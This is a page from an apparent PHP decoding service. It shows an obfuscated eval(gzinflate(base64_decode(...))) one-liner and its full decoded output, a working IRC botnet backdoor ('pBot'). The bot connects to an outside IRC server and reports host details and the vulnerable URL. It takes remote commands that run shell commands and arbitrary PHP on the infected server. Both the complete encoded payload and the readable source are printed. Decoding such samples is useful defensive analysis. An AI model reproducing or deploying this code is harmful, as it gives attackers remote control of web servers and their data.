Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval(gzinflate(base64_decode('5Rjbbts29D1A/oHmhEZCFFd2uha156BdaxTe2iRNmmJAYgiKTMVcJF..
Decoded Output download
set_time_limit(0);
error_reporting(0);
echo "ok!";
class pBot{
var $config = array("server"=>"irc.mildnet.net",
"port"=>"7000",
"pass"=>"",
"prefix"=>"pbot",
"maxrand"=>"2",
"chan"=>"#ccpower",
"chan2"=>"#siantar",
"key"=>"correct",
"modes"=>"+ps"
);
var $users = array();
function start(){
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))
$this->start();
$ident = $this->config['prefix'];
$alph = range("0","9");
for($i=0;$i<$this->config['maxrand'];$i++)
$ident .= $alph[rand(0,9)];
if(strlen($this->config['pass'])>0)
$this->send("PASS ".$this->config['pass']);
$this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
$this->send("NICK ".get_current_user()."");
$this->main();
}
function main(){
while(!feof($this->conn)){
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(" ",$this->buf);
if(substr($this->buf,0,6)=="PING :"){
$this->send("PONG :".substr($this->buf,6));
}
if(isset($cmd[1]) && $cmd[1] =="001"){
$this->send("MODE ".$this->nick." ".$this->config['modes']);
$this->join($this->config['chan'],$this->config['key']);
$this->join($this->config['chan2'],$this->config['key']);
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[uname!]: $uname (safe: $safemode)");
}
if(isset($cmd[1]) && $cmd[1]=="433"){
$this->set_nick();
}
if($this->buf != $old_buf){
$mcmd = array();
$msg = substr(strstr($this->buf," :"),2);
$msgcmd = explode(" ",$msg);
$nick = explode("!",$cmd[0]);
$vhost = explode("@",$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick){
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i+1];
}
else{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i];
}
if(count($cmd)>2){
switch($cmd[1]){
case "PRIVMSG":
if(substr($mcmd[0],0,1)=="!"){
switch(substr($mcmd[0],1)){
case "reload":
$this->send("QUIT :restart commando from $nick");
fclose($this->conn);
$this->start();
break;
case "safe":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on"){
$safemode = "on";
}
else {
$safemode = "off";
}
$this->privmsg($this->config['chan'],"[safe mode]: ".$safemode."");
break;
case "conback":
if(count($mcmd)>2){
$this->conback($mcmd[1],$mcmd[2]);
}
break;
case "dns":
if(isset($mcmd[1])){
$ip = explode(".",$mcmd[1]);
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3])){
$this->privmsg($this->config['chan'],"[dns]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
}
else{
$this->privmsg($this->config['chan'],"[dns]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
}
}
break;
case "info":
case "vuln":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[info]: $uname (safe: $safemode)");
$this->privmsg($this->config['chan'],"[vuln]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
break;
case "bot":
$this->privmsg($this->config['chan'],"[bot]: phpbotx");
break;
case "uname":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[info]: $uname (safe: $safemode)");
break;
case "rndnick":
$this->set_nick();
break;
case "raw":
$this->send(strstr($msg,$mcmd[1]));
break;
case "eval":
$eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1])));
break;
case "cmd":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = shell_exec($command);
$ret = explode("
",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "mati":
$this->send("QUIT : $nick Pasukan-ddos-ReloaD-X");
fclose($this->conn);
exit;
}
}
break;
}
}
}
$old_buf = $this->buf;
}
$this->start();
}
function send($msg){
fwrite($this->conn,"$msg
");
}
function join($chan,$key=NULL){
$this->send("JOIN $chan $key");
}
function privmsg($to,$msg){
$this->send("PRIVMSG $to :$msg");
}
function notice($to,$msg){
$this->send("NOTICE $to :$msg");
}
function set_nick(){
$this->nick = get_current_user();
for($i=0;$i<$this->config['maxrand'];$i++)
$this->nick .= mt_rand(0,9);
$this->send("NICK ".$this->nick);
}
}
$bot = new pBot;
$bot->start();
Did this file decode correctly?
Original Code
<?php eval(gzinflate(base64_decode('5Rjbbts29D1A/oHmhEZCFFd2uha156BdaxTe2iRNmmJAYgiKTMVcJFKg5FxQ9N93DilZN6dNsQJ7GNog4rnfD5mM5X7OE+bHPOG57Tnj7S2mlFS+YqlUORdXBTBcSkLldY/CIYyDLCPp7zL/sr11EyhihVJE/IpMSKBUcG/TjKkbpujkgHIV9hMeLwTL+/BD3e0tipIR98LzPAMAeQgwB8UifofH9FIahiS4U4FYIGyoAeEyEHj6JQxTeQuaSuBQQzMeiDww0Gt2j7BQKsXCQpxcMK1vN83o9hb6p71YgdnZ2gkERysR5lwKkoG43HbAXx7ZPdvKlzzbOwC3BdBHmQyvZcpEDQ7hON8xYdiZuy04BgChzLUyd99zHGd7qyApFIFuiy+YyEF8m1nHZ2eOJEGcLoECgnPFbArBpC+ptlsq2+ITb2zx31rsRSyB3+K7u85aTx8UobhzxNqe+9JBDeBtlqu46xqmbGfuHHg10xkw0uPXp6eE9jeTj1vEZ6fTEyTWJvQpGQxf9D34NyCxDIN4KbOcjGg/Xab+SgQJs50+pR0ph7M3f4KUKyjmcAVpFrmPqWwTJwEXOrJfa4k1QMjr7ZLHzO5FTEb19DqIK86XqwiCnSue2BEoy+p07q+DoaOVhckCqNhdGkOZ2ZRQt2J3ipCuLiGqdgV3Pfe5M5nQ49nhO3C4prMI6pGG97uMz53CIxDLs4zlNhpwPpg75MkTUnwTEO15g67cD0dvp1WyBA+vIQmd5Ol+aWTvb8k7FYHt1y11aL9HcQ6/wcojYr/igvsQdJgtQcR8NIk6RCroTJXLGIfAZhoHnIfJJYD6C7EQgXBiYGMCkWNxxjq4KDJIS9cdgGo1WHmTKn6TZFcPhIKeXww1S+9iOB+RQpSNekaVOoc+IoOQwGf7+80E5j4mzK64a2Xag26W8cLHmkOexFRlNdksMBsARUHBT6uuKJahOyxJNxQ1QDUWjajjeoBDoz2T9hvdxDX8K8AjD3pYJzAfAK0JLetd03tzd6A5SgajxbRUYSScJ5NaOaPz9WEYypXIS2JnPQIxPOcWn6PUQhCgtClFgfwLOfN1ggouZDkYomnZLc/D5TrhAAkDKEZ6fDL7/OH0HR01xkViHIRhMcBh0aM1EW2agVNJUyyWwQKFNZr/49nsExkpplcOCWWSwOSXJFIyITriZpWEscxYYySON2yrS8WC63GpEWvbGP9TOhcruN2568yQDhZ7V6Mf3aXITpBfNyoMwFJesUGa3oGAywDCM6onNamyWulBsiInA5hv+mM4Lzq2KXQhskJgMQQKLrOAeFpvoT511+hx3QieQmE8w7nBM1+sEqZ4iFBsxg3QwUbocCN0f15fhd8PKfhTBrMwFVbL5MDsaezgy/tgsVA1PxvN9jP16Knd1tNJABeRxAyY080qFj+xgv+T3YMefX/zPFochkSLW+Z5Onr6FCLuw/3t8/TkfMf89g9ff5juQALqqJPpx7Pp6Sf/7GSmUd1+wmv+6AcMAXptB4QFPu82SNT+/j/S13RciYWe3KPN94QWcXDbXgrlRQAscxsd0+RkN0GsWfEDJxP8slt3iYYIt3xFrGVuGKuJ2VHFJureTiqJXlsiAHbN5YDdsRBZlyyOfTzYpUCNVqxxGbkQMEqRqv1qKgYqkK+3O94y4IwbvTc5PHv/3nlsMgmOJ/1uKAVscD8Jcv7AjjbrmBwH2eo6EHuLhcz2TnCpv9376xtLmt3xvDPsvpb/y/th9cKEQ2NvVtu9/mLShunbH96JbhXPG4pdirgLBZFtc5q7PwbFteByb2LYfpL8cTQ7JJqIIFFHSBVq6ZZWNN9K5u4ETkkyQoqOCCFzHrKHJRwefZq9mX5DQNVTFWtxY+0+Qn/0OV4TB2/yJPfXD/IH3r316+46wRZMRjBHsFv9h5qxgVQ5/Qc='))); ?>
Function Calls
gzinflate | 1 |
base64_decode | 1 |
Stats
MD5 | 4a8f94425c453390f51b64317d6f5a36 |
Eval Count | 1 |
Decode Time | 95 ms |